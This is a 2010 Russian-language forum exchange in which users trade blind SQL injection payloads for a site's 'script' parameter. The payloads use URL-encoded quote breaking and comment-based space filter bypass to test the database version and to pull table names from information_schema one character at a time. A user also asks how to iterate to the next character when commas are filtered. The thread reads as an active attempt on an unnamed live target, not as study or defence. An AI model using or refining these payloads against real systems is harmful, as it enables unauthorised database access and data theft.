23.01.2010, 19:14
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от v1d0qz
ой извини дружище, писал на спешку уходя с офиса. Вот правильный запрос.
?script=%2527%29%29/**/and/**/substring%28version%28%29/**/from/**/1/**/for/**/1%29=5/*
На счёт дальнейшего перебора, мой вам совет, возьмите для начала что-нибудь по проще, толк будет намного больше, я серьёзно...
ps. а по поводу как именно перебирать, то здесь всё просто.
?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(info rmation_schema.tables)where/**/table_name=%2527CHARACTER_SETS%2527/**/LIMIT/**/1)/**/from/**/1/**/for/**/1)))=99/*
угу немного сложновато придется перебор, вот я саму конструкцию немного непонял. Где тут номер для второго символа ставит?
/LIMIT/**/ 2,1)/**/from/**/1/**/for/**/1)))=99/* не пашет так как на запятую ругается. Если бы запрос было таким: AND ascii(lower(substring(user(),4,1)))>110 то понятно что тут четвертый символ перебирается, но выше немного посложнее как видно и еще на запросе уже написан имя character_sets и зачем надо еще раз перебират если уже известно название ))
|
|
|